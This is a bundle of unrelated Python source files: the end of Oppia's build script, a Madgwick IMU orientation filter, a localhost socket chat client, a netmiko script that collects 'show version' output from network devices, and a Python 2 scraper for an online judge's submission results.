python_utils.PRINT('Minifying %s' % source_path)
_minify(source_path, target_path)
else:
python_utils.PRINT('Copying %s' % source_path)
safe_copy_file(source_path, target_path)
def _execute_tasks(tasks, batch_size=24):
"""Starts all tasks and checks the results.
Runs no more than 'batch_size' tasks at a time.
"""
remaining_tasks = collections.deque(tasks)
currently_running_tasks = []
while remaining_tasks or currently_running_tasks:
if currently_running_tasks:
for task in collections.deque(currently_running_tasks):
if not task.is_alive():
currently_running_tasks.remove(task)
while remaining_tasks and len(currently_running_tasks) < batch_size:
task = remaining_tasks.popleft()
currently_running_tasks.append(task)
try:
task.start()
except RuntimeError:
raise OSError('threads can only be started once')
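# Hedged sketch of how _execute_tasks batches work: at most batch_size threads
# run at a time, and finished threads are removed before new ones start. The
# no-op worker below exists only for this illustration.
def _example_execute_noop_tasks(task_count=50):
    noop_tasks = collections.deque(
        threading.Thread(target=lambda: None)
        for _ in python_utils.RANGE(task_count))
    _execute_tasks(noop_tasks, batch_size=8)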
def generate_build_tasks_to_build_all_files_in_directory(source, target):
"""This function queues up tasks to build all files in a directory,
excluding files that should not be built.
Args:
source: str. Path relative to /oppia of directory containing source
files and directories to be built.
target: str. Path relative to /oppia of directory where the built files
and directories will be saved to.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
python_utils.PRINT('Processing %s' % os.path.join(os.getcwd(), source))
python_utils.PRINT('Generating into %s' % os.path.join(os.getcwd(), target))
build_tasks = collections.deque()
for root, dirnames, filenames in os.walk(os.path.join(os.getcwd(), source)):
for directory in dirnames:
python_utils.PRINT(
'Building directory %s' % os.path.join(root, directory))
for filename in filenames:
source_path = os.path.join(root, filename)
target_path = source_path.replace(source, target)
ensure_directory_exists(target_path)
if should_file_be_built(source_path):
task = threading.Thread(
target=minify_func,
args=(source_path, target_path, filename,))
build_tasks.append(task)
return build_tasks
def generate_build_tasks_to_build_files_from_filepaths(
source_path, target_path, filepaths):
"""This function queues up build tasks to build files from a list of
filepaths, excluding files that should not be built.
Args:
source_path: str. Path relative to /oppia directory of directory
containing files and directories to be copied.
target_path: str. Path relative to /oppia directory of directory where
to copy the files and directories.
filepaths: list(str). List of filepaths to be built.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
build_tasks = collections.deque()
for filepath in filepaths:
source_file_path = os.path.join(source_path, filepath)
target_file_path = os.path.join(target_path, filepath)
ensure_directory_exists(target_file_path)
if should_file_be_built(source_file_path):
task = threading.Thread(
target=minify_func,
args=(
source_file_path, target_file_path, filepath,))
build_tasks.append(task)
return build_tasks
def generate_delete_tasks_to_remove_deleted_files(
source_dir_hashes, staging_directory):
"""This function walks the staging directory and queues up deletion tasks to
remove files that are not in the hash dict i.e. remaining files in staging
directory that have since been deleted from source directory. Files with
extensions in FILE_EXTENSIONS_TO_IGNORE will be excluded.
Args:
source_dir_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
staging_directory: str. Path relative to /oppia directory of directory
containing files and directories to be walked.
Returns:
deque(Thread). A deque that contains all delete tasks
queued to be processed.
"""
python_utils.PRINT(
        'Scanning directory %s to remove deleted files' % staging_directory)
delete_tasks = collections.deque()
for root, _, filenames in os.walk(
os.path.join(os.getcwd(), staging_directory)):
for filename in filenames:
target_path = os.path.join(root, filename)
# Ignore files with certain extensions.
if not any(
target_path.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
# On Windows the path is on Windows-Style, while the path in
# hashes is in posix style, we need to convert it so the check
# can run correctly.
relative_path = common.convert_to_posixpath(
os.path.relpath(target_path, staging_directory))
# Remove file found in staging directory but not in source
# directory, i.e. file not listed in hash dict.
if relative_path not in source_dir_hashes:
python_utils.PRINT(
'Unable to find %s in file hashes, deleting file'
% target_path)
task = threading.Thread(
target=safe_delete_file, args=(target_path,))
delete_tasks.append(task)
return delete_tasks
def get_recently_changed_filenames(source_dir_hashes, out_dir):
"""Compare hashes of source files and built files. Return a list of
filenames that were recently changed. Skips files that are not supposed to
built or already built.
Args:
source_dir_hashes: dict(str, str). Dictionary of hashes of files
to be built.
out_dir: str. Path relative to /oppia where built files are located.
Returns:
list(str). List of filenames expected to be re-hashed.
"""
# Hashes are created based on files' contents and are inserted between
# the filenames and their extensions,
# e.g base.240933e7564bd72a4dde42ee23260c5f.html
# If a file gets edited, a different MD5 hash is generated.
recently_changed_filenames = []
# Currently, Python files and HTML files are always re-built.
file_extensions_not_to_track = ('.html', '.py',)
for filename, md5_hash in source_dir_hashes.items():
# Skip files that are already built or should not be built.
if should_file_be_built(filename) and not any(
filename.endswith(p) for p in file_extensions_not_to_track):
final_filepath = _insert_hash(
os.path.join(out_dir, filename), md5_hash)
if not os.path.isfile(final_filepath):
# Filename with provided hash cannot be found, this file has
# been recently changed or created since last build.
recently_changed_filenames.append(filename)
if recently_changed_filenames:
python_utils.PRINT(
'The following files will be rebuilt due to recent changes: %s'
% recently_changed_filenames)
return recently_changed_filenames
def generate_build_tasks_to_build_directory(dirnames_dict):
"""This function queues up build tasks to build all files in source
directory if there is no existing staging directory. Otherwise, selectively
queue up build tasks to build recently changed files.
Args:
dirnames_dict: dict(str, str). This dict should contain three keys,
with corresponding values as follows:
- 'dev_dir': the directory that contains source files to be built.
- 'staging_dir': the directory that contains minified files waiting
for final copy process.
- 'out_dir': the final directory that contains built files with hash
inserted into filenames.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
source_dir = dirnames_dict['dev_dir']
staging_dir = dirnames_dict['staging_dir']
out_dir = dirnames_dict['out_dir']
build_tasks = collections.deque()
if not os.path.isdir(staging_dir):
# If there is no staging dir, perform build process on all files.
python_utils.PRINT('Creating new %s folder' % staging_dir)
ensure_directory_exists(staging_dir)
build_tasks += generate_build_tasks_to_build_all_files_in_directory(
source_dir, staging_dir)
else:
# If staging dir exists, rebuild all HTML and Python files.
file_extensions_to_always_rebuild = ('.html', '.py',)
python_utils.PRINT(
'Staging dir exists, re-building all %s files'
% ', '.join(file_extensions_to_always_rebuild))
filenames_to_always_rebuild = get_filepaths_by_extensions(
source_dir, file_extensions_to_always_rebuild)
build_tasks += generate_build_tasks_to_build_files_from_filepaths(
source_dir, staging_dir, filenames_to_always_rebuild)
dev_dir_hashes = get_file_hashes(source_dir)
source_hashes = {}
source_hashes.update(dev_dir_hashes)
# Clean up files in staging directory that cannot be found in file
# hashes dictionary.
_execute_tasks(generate_delete_tasks_to_remove_deleted_files(
source_hashes, staging_dir))
python_utils.PRINT(
'Getting files that have changed between %s and %s'
% (source_dir, out_dir))
recently_changed_filenames = get_recently_changed_filenames(
dev_dir_hashes, out_dir)
if recently_changed_filenames:
python_utils.PRINT(
'Re-building recently changed files at %s' % source_dir)
build_tasks += generate_build_tasks_to_build_files_from_filepaths(
source_dir, staging_dir, recently_changed_filenames)
else:
python_utils.PRINT(
'No changes detected. Using previously built files.')
return build_tasks
def _verify_filepath_hash(relative_filepath, file_hashes):
"""Ensure that hashes in filepaths match with the hash entries in hash
dict.
Args:
relative_filepath: str. Filepath that is relative from /build.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Raises:
ValueError. The hash dict is empty.
ValueError. Filepath has less than 2 partitions after splitting by '.'
delimiter.
ValueError. The filename does not contain hash.
KeyError. The filename's hash cannot be found in the hash dict.
"""
# Final filepath example:
# pages/base.240933e7564bd72a4dde42ee23260c5f.html.
if not file_hashes:
raise ValueError('Hash dict is empty')
filename_partitions = relative_filepath.split('.')
if len(filename_partitions) < 2:
raise ValueError('Filepath has less than 2 partitions after splitting')
hash_string_from_filename = filename_partitions[-2]
# Ensure hash string obtained from filename follows MD5 hash format.
if not re.search(r'([a-fA-F\d]{32})', relative_filepath):
if relative_filepath not in file_hashes:
return
raise ValueError(
'%s is expected to contain MD5 hash' % relative_filepath)
if hash_string_from_filename not in file_hashes.values():
raise KeyError(
'Hash from file named %s does not match hash dict values' %
relative_filepath)
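# Hedged illustration of the check above: a hashed filename carries a
# 32-character hex digest as its second-to-last dot-separated component. The
# sample filename is fabricated for demonstration purposes only.
def _example_extract_hash_from_filename():
    sample_filepath = 'pages/base.240933e7564bd72a4dde42ee23260c5f.html'
    match = re.search(r'([a-fA-F\d]{32})', sample_filepath)
    # match.group(1) is '240933e7564bd72a4dde42ee23260c5f', the value that
    # _verify_filepath_hash expects to find among file_hashes.values().
    return match.group(1) if match else None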
def _verify_hashes(output_dirnames, file_hashes):
"""Verify a few metrics after build process finishes:
    1) The hashes in filenames belong to the hash dict.
2) hashes.json, third_party.min.css and third_party.min.js are built and
hashes are inserted.
Args:
output_dirnames: list(str). List of directory paths that contain
built files.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
"""
# Make sure that hashed file name matches with current hash dict.
for built_dir in output_dirnames:
for root, _, filenames in os.walk(built_dir):
for filename in filenames:
parent_dir = os.path.basename(root)
converted_filepath = os.path.join(
THIRD_PARTY_GENERATED_DEV_DIR, parent_dir, filename)
if hash_should_be_inserted(converted_filepath):
# Obtain the same filepath format as the hash dict's key.
relative_filepath = os.path.relpath(
os.path.join(root, filename), built_dir)
_verify_filepath_hash(relative_filepath, file_hashes)
hash_final_filename = _insert_hash(
HASHES_JSON_FILENAME, file_hashes[HASHES_JSON_FILENAME])
# The path in hashes.json (generated via file_hashes) file is in posix
# style, see the comment above HASHES_JSON_FILENAME for details.
third_party_js_final_filename = _insert_hash(
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH,
file_hashes[common.convert_to_posixpath(
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH)])
# The path in hashes.json (generated via file_hashes) file is in posix
# style, see the comment above HASHES_JSON_FILENAME for details.
third_party_css_final_filename = _insert_hash(
MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH,
file_hashes[common.convert_to_posixpath(
MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH)])
_ensure_files_exist([
os.path.join(ASSETS_OUT_DIR, hash_final_filename),
os.path.join(
THIRD_PARTY_GENERATED_OUT_DIR, third_party_js_final_filename),
os.path.join(
THIRD_PARTY_GENERATED_OUT_DIR, third_party_css_final_filename)])
def generate_hashes():
"""Generates hashes for files."""
# The keys for hashes are filepaths relative to the subfolders of the future
# /build folder. This is so that the replacing inside the HTML files works
# correctly.
hashes = dict()
# Create hashes for all directories and files.
hash_dirs = [
ASSETS_DEV_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['dev_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['dev_dir'],
THIRD_PARTY_GENERATED_DEV_DIR]
for hash_dir in hash_dirs:
hashes.update(get_file_hashes(hash_dir))
# Save hashes as JSON and write the JSON into JS file
# to make the hashes available to the frontend.
save_hashes_to_file(hashes)
# Update hash dict with newly created hashes.json.
hashes.update(
{HASHES_JSON_FILENAME: generate_md5_hash(HASHES_JSON_FILEPATH)})
# Make sure /assets/hashes.json is available to the frontend.
_ensure_files_exist([HASHES_JSON_FILEPATH])
return hashes
def generate_build_directory(hashes):
"""Generates hashes for files. Minifies files and interpolates paths
in HTMLs to include hashes. Renames the files to include hashes and copies
them into build directory.
"""
python_utils.PRINT('Building Oppia in production mode...')
build_tasks = collections.deque()
copy_tasks = collections.deque()
# Build files in /extensions and copy them into staging directory.
build_tasks += generate_build_tasks_to_build_directory(
EXTENSIONS_DIRNAMES_TO_DIRPATHS)
# Minify all template files and copy them into staging directory.
build_tasks += generate_build_tasks_to_build_directory(
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS)
_execute_tasks(build_tasks)
# Copy all files from staging directory to production directory.
copy_input_dirs = [
ASSETS_DEV_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['staging_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['staging_dir'],
THIRD_PARTY_GENERATED_DEV_DIR,
WEBPACK_DIRNAMES_TO_DIRPATHS['staging_dir']]
copy_output_dirs = [
ASSETS_OUT_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['out_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['out_dir'],
THIRD_PARTY_GENERATED_OUT_DIR, WEBPACK_DIRNAMES_TO_DIRPATHS['out_dir']]
assert len(copy_input_dirs) == len(copy_output_dirs)
for i in python_utils.RANGE(len(copy_input_dirs)):
safe_delete_directory_tree(copy_output_dirs[i])
copy_tasks += generate_copy_tasks_to_copy_from_source_to_target(
copy_input_dirs[i], copy_output_dirs[i], hashes)
_execute_tasks(copy_tasks)
_verify_hashes(copy_output_dirs, hashes)
source_dirs_for_assets = [ASSETS_DEV_DIR, THIRD_PARTY_GENERATED_DEV_DIR]
output_dirs_for_assets = [ASSETS_OUT_DIR, THIRD_PARTY_GENERATED_OUT_DIR]
_compare_file_count(source_dirs_for_assets, output_dirs_for_assets)
source_dirs_for_third_party = [THIRD_PARTY_GENERATED_DEV_DIR]
output_dirs_for_third_party = [THIRD_PARTY_GENERATED_OUT_DIR]
_compare_file_count(
source_dirs_for_third_party, output_dirs_for_third_party)
source_dirs_for_webpack = [WEBPACK_DIRNAMES_TO_DIRPATHS['staging_dir']]
output_dirs_for_webpack = [WEBPACK_DIRNAMES_TO_DIRPATHS['out_dir']]
_compare_file_count(
source_dirs_for_webpack, output_dirs_for_webpack)
source_dirs_for_extensions = [
EXTENSIONS_DIRNAMES_TO_DIRPATHS['dev_dir']]
output_dirs_for_extensions = [EXTENSIONS_DIRNAMES_TO_DIRPATHS['out_dir']]
_compare_file_count(source_dirs_for_extensions, output_dirs_for_extensions)
source_dirs_for_templates = [
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['dev_dir']]
output_dirs_for_templates = [
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['out_dir']]
_compare_file_count(source_dirs_for_templates, output_dirs_for_templates)
python_utils.PRINT('Build completed.')
def main(args=None):
"""The main method of this script."""
options = _PARSER.parse_args(args=args)
if options.maintenance_mode and not options.prod_env:
raise Exception(
'maintenance_mode should only be enabled in prod build.')
# Regenerate /third_party/generated from scratch.
safe_delete_directory_tree(THIRD_PARTY_GENERATED_DEV_DIR)
build_third_party_libs(THIRD_PARTY_GENERATED_DEV_DIR)
# If minify_third_party_libs_only is set to True, skips the rest of the
# build process once third party libs are minified.
if options.minify_third_party_libs_only:
if options.prod_env:
minify_third_party_libs(THIRD_PARTY_GENERATED_DEV_DIR)
return
else:
raise Exception(
'minify_third_party_libs_only should not be '
'set in non-prod env.')
modify_constants(
prod_env=options.prod_env,
emulator_mode=not options.deploy_mode,
maintenance_mode=options.maintenance_mode)
if options.prod_env:
minify_third_party_libs(THIRD_PARTY_GENERATED_DEV_DIR)
hashes = generate_hashes()
if options.deparallelize_terser:
if options.source_maps:
raise Exception(
'source_maps flag shouldn\'t be used with '
'deparallelize_terser flag.')
build_using_webpack(WEBPACK_TERSER_CONFIG)
elif options.source_maps:
build_using_webpack(WEBPACK_PROD_SOURCE_MAPS_CONFIG)
else:
build_using_webpack(WEBPACK_PROD_CONFIG)
generate_app_yaml(
deploy_mode=options.deploy_mode,
maintenance_mode=options.maintenance_mode)
generate_build_directory(hashes)
save_hashes_to_file(dict())
# The 'no coverage' pragma is used as this line is un-testable. This is because
# it will only be called when build.py is used as a script.
if __name__ == '__main__': # pragma: no cover
main()
|
orientation.py
|
import numpy
from classes.quaternion import *
from classes.dataStreamReader import *
import threading
import math
import time
class Madgwick(threading.Thread):
# IMU sensor needs to be rotated by PI/2 on x axis!
# IMU data: timestamp, angular_velocity, linear_acceleration, magnetic_field
IMU_FREQ = 60.0 # 60Hz
GAIN = 0.56 # around 0.5 should be quite fast and without big overshoot
def __init__(self, imu_data, sample_frequency=IMU_FREQ, gain=GAIN):
"""
Initializes Madgwick's filter implementation.
:param imu_data: need to receive object of type Reader that returns data from IMU
:param sample_frequency: self explanatory - usually it is fixed frequency of simulation,
didn't figure out how to change that tho
:param gain: based on this settling time and overshoot will change
"""
super(Madgwick, self).__init__()
        time.sleep(1)  # give the data reader time to start before the filter uses its data
self.imu_data = imu_data
self.q = Quaternion()
self.gain = gain
self.sample_frequency = sample_frequency
self.prev_data_time = time.time()
self.prev_update_time = time.time()
# self.roll = 0.0
# self.pitch = 0.0
# self.yaw = 0.0
def roll(self):
"""
Roll wrapper.
:return: roll in degrees (-180, 180), base is 90 degrees, 180 when lying on right side,
0 when lying on left side
"""
roll, _, _ = self.q.quaternion_to_angles()
return roll
def pitch(self):
"""
Pitch wrapper.
:return: pitch in degrees (-90, 90), base is 0 degrees, positive values increase when looking down,
negative values decrease when looking up
"""
_, pitch, _ = self.q.quaternion_to_angles()
return pitch
def yaw(self):
"""
Yaw wrapper.
        :return: yaw in degrees (-180, 180), base is 0 degrees; positive values when rotating left,
                 negative values when rotating right (given that roll is positive); the sign flips at 180
"""
_, _, yaw = self.q.quaternion_to_angles()
return yaw
def angles(self):
"""
        Returns all angles (roll, pitch, yaw) in degrees.
        :return: tuple of (roll, pitch, yaw)
"""
return self.q.quaternion_to_angles()
def rate_of_change_of_quaternion_from_gyro(self, gyro):
"""
Calculates rate of change of quaternion from gyroscope data.
:param gyro: list [gx, gy, gz] with rad/s
:return:
"""
q_dot = Quaternion()
q_dot.w = 0.5 * (-self.q.x * gyro[0] - self.q.y * gyro[1] - self.q.z * gyro[2])
q_dot.x = 0.5 * (self.q.w * gyro[0] + self.q.y * gyro[2] - self.q.z * gyro[1])
q_dot.y = 0.5 * (self.q.w * gyro[1] - self.q.x * gyro[2] + self.q.z * gyro[0])
q_dot.z = 0.5 * (self.q.w * gyro[2] + self.q.x * gyro[1] - self.q.y * gyro[0])
return q_dot
def normalize_vec(self, vec):
"""
Normalizes list of length 3
:param vec: list [v1, v2, v3]
:return: normalized list
"""
# inv sqrt
recip_norm = (vec[0] ** 2 + vec[1] ** 2 + vec[2] ** 2) ** -0.5
vec[0] *= recip_norm
vec[1] *= recip_norm
vec[2] *= recip_norm
return vec
def update(self):
"""
        Heart of the algorithm. Collects IMU data from the data reader and runs several filter
        iterations per data sample: the gyroscope rate is integrated and a gradient descent
        corrective step is applied using the accelerometer and magnetometer measurements.
Must be run as a thread!
:return:
"""
while True:
# initial data sample
acc = self.imu_data.get('linear_acceleration')
gyro = self.imu_data.get('angular_velocity')
mag = self.imu_data.get('magnetic_field')
# data update every 16.66667ms
if time.time() > self.prev_data_time + 1.0 / self.sample_frequency:
# print("obtaining data")
self.prev_data_time = time.time()
acc = self.imu_data.get('linear_acceleration')
gyro = self.imu_data.get('angular_velocity')
mag = self.imu_data.get('magnetic_field')
# madgwick update every 3.33333ms so it does update 5 times on each data sample
if time.time() > self.prev_update_time + 1.0 / 5.0 / self.sample_frequency:
# print("update")
self.prev_update_time = time.time()
q_dot = self.rate_of_change_of_quaternion_from_gyro(gyro)
# Compute feedback only if accelerometer measurement valid (avoids NaN in accelerometer normalisation)
if not((acc[0] == 0.0) and (acc[1] == 0.0) and (acc[2] == 0.0)):
# Normalise accelerometer measurement
acc = self.normalize_vec(acc)
# Normalise magnetometer measurement
mag = self.normalize_vec(mag)
# Auxiliary variables to avoid repeated arithmetic
two_q0mx = 2.0 * self.q.w * mag[0]
two_q0my = 2.0 * self.q.w * mag[1]
two_q0mz = 2.0 * self.q.w * mag[2]
two_q1mx = 2.0 * self.q.x * mag[0]
two_q0 = 2.0 * self.q.w
two_q1 = 2.0 * self.q.x
two_q2 = 2.0 * self.q.y
two_q3 = 2.0 * self.q.z
two_q0q2 = 2.0 * self.q.w * self.q.y
two_q2q3 = 2.0 * self.q.y * self.q.z
q0q0 = self.q.w ** 2
q0q1 = self.q.w * self.q.x
q0q2 = self.q.w * self.q.y
q0q3 = self.q.w * self.q.z
q1q1 = self.q.x ** 2
q1q2 = self.q.x * self.q.y
q1q3 = self.q.x * self.q.z
q2q2 = self.q.y ** 2
q2q3 = self.q.y * self.q.z
q3q3 = self.q.z ** 2
# Reference direction of Earth's magnetic field
hx = mag[0] * q0q0 - two_q0my * self.q.z + two_q0mz * self.q.y + mag[0] * q1q1 \
+ two_q1 * mag[1] * self.q.y + two_q1 * mag[2] * self.q.z - mag[0] * q2q2 - mag[0] * q3q3
hy = two_q0mx * self.q.z + mag[1] * q0q0 - two_q0mz * self.q.x + two_q1mx * self.q.y \
- mag[1] * q1q1 + mag[1] * q2q2 + two_q2 * mag[2] * self.q.z - mag[1] * q3q3
two_bx = math.sqrt(hx * hx + hy * hy)
two_bz = -two_q0mx * self.q.y + two_q0my * self.q.x + mag[2] * q0q0 + two_q1mx * self.q.z \
- mag[2] * q1q1 + two_q2 * mag[1] * self.q.z - mag[2] * q2q2 + mag[2] * q3q3
four_bx = 2.0 * two_bx
four_bz = 2.0 * two_bz
                    # Gradient descent algorithm corrective step
s = Quaternion()
                    s.w = -two_q2 * (2.0 * q1q3 - two_q0q2 - acc[0]) + two_q1 * (2.0 * q0q1 + two_q2q3 - acc[1]) \
                        - two_bz * self.q.y * (two_bx * (0.5 - q2q2 - q3q3) + two_bz * (q1q3 - q0q2) - mag[0]) \
                        + (-two_bx * self.q.z + two_bz * self.q.x) * (two_bx * (q1q2 - q0q3) + two_bz * (q0q1 + q2q3) - mag[1]) \
                        + two_bx * self.q.y * (two_bx * (q0q2 + q1q3) + two_bz * (0.5 - q1q1 - q2q2) - mag[2])
s.x = two_q3 * (2.0 * q1q3 - two_q0q2 - acc[0]) + two_q0 * (2.0 * q0q1 + two_q2q3 - acc[1]) \
- 4.0 * self.q.x * (1 - 2.0 * q1q1 - 2.0 * q2q2 - acc[2]) + two_bz * self.q.z * (two_bx * (0.5 - q2q2 - q3q3) + two_bz * (q1q3 - q0q2) - mag[0]) \
+ (two_bx * self.q.y + two_bz * self.q.w) * (two_bx * (q1q2 - q0q3) + two_bz * (q0q1 + q2q3) - mag[1]) \
+ (two_bx * self.q.z - four_bz * self.q.x) * (two_bx * (q0q2 + q1q3) + two_bz * (0.5 - q1q1 - q2q2) - mag[2])
s.y = -two_q0 * (2.0 * q1q3 - two_q0q2 - acc[0]) + two_q3 * (2.0 * q0q1 + two_q2q3 - acc[1]) \
- 4.0 * self.q.y * (1 - 2.0 * q1q1 - 2.0 * q2q2 - acc[2]) + (-four_bx * self.q.y - two_bz * self.q.w) \
* (two_bx * (0.5 - q2q2 - q3q3) + two_bz * (q1q3 - q0q2) - mag[0]) + (two_bx * self.q.x + two_bz * self.q.z) \
* (two_bx * (q1q2 - q0q3) + two_bz * (q0q1 + q2q3) - mag[1]) + (two_bx * self.q.w - four_bz * self.q.y) \
* (two_bx * (q0q2 + q1q3) + two_bz * (0.5 - q1q1 - q2q2) - mag[2])
s.z = two_q1 * (2.0 * q1q3 - two_q0q2 - acc[0]) + two_q2 * (2.0 * q0q1 + two_q2q3 - acc[1]) \
+ (-four_bx * self.q.z + two_bz * self.q.x) * (two_bx * (0.5 - q2q2 - q3q3) + two_bz * (q1q3 - q0q2) - mag[0]) \
+ (-two_bx * self.q.w + two_bz * self.q.y) * (two_bx * (q1q2 - q0q3) + two_bz * (q0q1 + q2q3) - mag[1]) \
+ two_bx * self.q.x * (two_bx * (q0q2 + q1q3) + two_bz * (0.5 - q1q1 - q2q2) - mag[2])
# Normalise
s.normalize()
# Apply feedback step
q_dot.w -= self.gain * s.w
q_dot.x -= self.gain * s.x
q_dot.y -= self.gain * s.y
q_dot.z -= self.gain * s.z
# Integrate rate of change of quaternion to yield quaternion
self.q.w += q_dot.w * (1.0 / self.sample_frequency)
self.q.x += q_dot.x * (1.0 / self.sample_frequency)
self.q.y += q_dot.y * (1.0 / self.sample_frequency)
self.q.z += q_dot.z * (1.0 / self.sample_frequency)
                # Normalise quaternion
self.q.normalize()
def run(self):
"""
Runs the update method as a thread.
:return:
"""
update_thread = threading.Thread(target=self.update)
update_thread.start()
#
# def main():
# # create reader to obtain live data from IMU
# imu_data = Reader('localhost', 60009)
# imu_data.start()
#
# # get Madgwick filter running to calc orientation
# orientation = Madgwick(imu_data)
# orientation.start()
#
# while True:
# time.sleep(0.5)
# print(orientation.roll(), orientation.pitch(), orientation.yaw())
# # print(orientation.q.w, orientation.q.x, orientation.q.y, orientation.q.z)
# pass
#
# if __name__=='__main__':
# main()
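# Hedged, self-contained sketch of the core integration step performed inside
# Madgwick.update(): the quaternion derivative 0.5 * q * (0, gx, gy, gz)
# (quaternion product) is integrated over one sample period and renormalized.
# Plain tuples stand in for the project's Quaternion class, purely for
# illustration; the full filter additionally applies the gradient descent
# correction shown above.
def _example_gyro_only_step(q, gyro, sample_frequency=60.0):
    w, x, y, z = q
    gx, gy, gz = gyro
    q_dot = (0.5 * (-x * gx - y * gy - z * gz),
             0.5 * (w * gx + y * gz - z * gy),
             0.5 * (w * gy - x * gz + z * gx),
             0.5 * (w * gz + x * gy - y * gx))
    dt = 1.0 / sample_frequency
    w, x, y, z = (w + q_dot[0] * dt, x + q_dot[1] * dt,
                  y + q_dot[2] * dt, z + q_dot[3] * dt)
    norm = math.sqrt(w * w + x * x + y * y + z * z)
    return (w / norm, x / norm, y / norm, z / norm)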
|
client.py
|
import socket
import threading
host = "127.0.0.1"
port = 5000
nickname = input("Choose a nickname: ")
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
def receive():
while True:
try:
message = client.recv(1024).decode("ascii")
if message == "NICK":
client.send(nickname.encode("ascii"))
else:
print(message)
except:
print("an error occurred")
client.close()
break
def write():
while True:
message = f'{nickname}: {input(":::")}'
client.send(message.encode("ascii"))
receive_thread = threading.Thread(target=receive)
receive_thread.start()
write_thread = threading.Thread(target=write)
write_thread.start()
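# Hedged companion sketch (not part of the original client): a minimal local
# server that follows the handshake this client expects -- it sends "NICK"
# first, reads the nickname back, then echoes every message to the single
# connected client. Useful only for trying the client against 127.0.0.1:5000;
# the real chat server may behave differently.
def _example_echo_server(server_host="127.0.0.1", server_port=5000):
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind((server_host, server_port))
    server.listen(1)
    conn, _ = server.accept()
    conn.send("NICK".encode("ascii"))
    print(f"{conn.recv(1024).decode('ascii')} connected")
    while True:
        message = conn.recv(1024)
        if not message:
            break
        conn.send(message)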
|
Ex2.py
|
#!/usr/bin/env python
import yaml
from pprint import pprint
from netmiko import ConnectHandler
from multiprocessing import Process,Queue
import pdb
STREAM = '../../.netmiko.yml'
with open(STREAM) as file_in:
    devices = yaml.safe_load(file_in)
#pprint(devices)
def command_runner(gear):
output = {}
connector = ConnectHandler(**gear)
#print()
output_header = '\n' + '*' * 40 + '\n'
hostname = connector.find_prompt()
output_footer = '\n' + '*' * 40 + '\n'
output_value = connector.send_command("show version")
output[hostname] = output_header + output_value + output_footer
process_queue.put(output)
#pdb.set_trace()
process_queue = Queue(maxsize = 50)
procs = []
for k,v in devices.items():
#print(k,v)
process = Process(target=command_runner, args=(v, ) )
print(type(process))
process.start()
procs.append(process)
for proc in procs:
proc.join()
while not process_queue.empty():
output_dict = process_queue.get()
for i,j in output_dict.items():
print("Hostname: {}".format(i))
print("{}".format(j))
print()
print()
print()
|
Judging.py
|
import os
import re
import sys
import time
import getpass
import urllib2
import threading
import test
def wait(arg1 , stop_event):
try :
while (not stop_event.is_set()):
sys.stdout.write('.')
sys.stdout.flush()
stop_event.wait(0.3)
except Exception as error :
print "Error Ocurred while running thread !!"
def get_status(url,ID):
try :
htmltext = urllib2.urlopen(url)
except Exception as error:
print "Unable to Fetch Result !!"
print error
htmltext = htmltext.read(13000)
pat = "id=\"statusres_"+ ID + "\".*?>(.*?)</td>"
match = re.search(pat,htmltext,re.DOTALL)
if not match :
print "Error in parsing the webpage !!"
        return "", htmltext
resp = match.group(1)
resp = resp.replace("\n","")
resp = resp.replace("\t" , "")
resp = resp.strip()
result = resp.find("runtime error")
if result >= 0 :
match = re.search("<a.*?>(.*?)</a>",resp,re.DOTALL)
if match :
resp = "runtime error" + '(' + match.group(1) + ')'
match = re.search("runtime error(.+)",resp,re.DOTALL)
if match :
resp = "runtime error" + '(' + match.group(1).replace(" ","") + ')'
else : resp = "runtime error"
return resp,htmltext
def parse(htmltext , ID):
ID = ID.strip()
pattern = "id=\"statustime_" + ID + "\">.*?<a.*?>(.*?)</a>"
match = re.search(pattern,htmltext,re.DOTALL)
if match :
match = match.group(1)
match = match.replace("\n","")
match = match.replace("\t","")
match = match.strip()
else:
match = "0.0"
time = match
pattern = "id=\"statusmem_" + ID + "\">(.*?)</td>.*?<p>(.*?)</p>(.*?)/td>"
match = re.search(pattern,htmltext,re.DOTALL)
if match:
memory = match.group(1)
memory = memory.replace("\n","")
memory = memory.replace("\t","")
memory = memory.strip()
else : memory = "0M"
if match :
lang = match.group(2)
lang = lang.replace("\n","")
lang = lang.replace("\t","")
lang= lang.strip()
st = match.group(3)
temp = re.search("class=.*?>(.*?)</p>",st,re.DOTALL)
if temp :
lang = lang + '('+ temp.group(1) + ')'
else : lang = "Default"
return time,memory ,lang
def check(status , htmltext,ID):
status = status.strip()
if status.startswith("accepted") :
print
print "Hooray !! Your solution got " + status
extime , memory , lang = parse(htmltext , ID)
print "Execution Time : %s \t" % extime,
print "Memory Used : %s \t" % memory ,
print "Language : %s " % lang
return True
elif status.startswith("wrong") :
print
print "Oops !! Wrong Answer .Check the boundary constraint "
extime , memory , lang = parse(htmltext , ID)
print "Execution Time : %s \t" % extime,
print "Memory Used : %s \t" % memory ,
print "Language : %s " % lang
return True
elif status.startswith("time") :
print
print "Oops !! Time Limit Exceeded .Try to optimize your algorithm"
extime , memory , lang = parse(htmltext , ID)
print "Execution Time : %s \t" % extime,
print "Memory Used : %s \t" % memory ,
print "Language : %s " % lang
return True
elif status.startswith("runtime"):
print
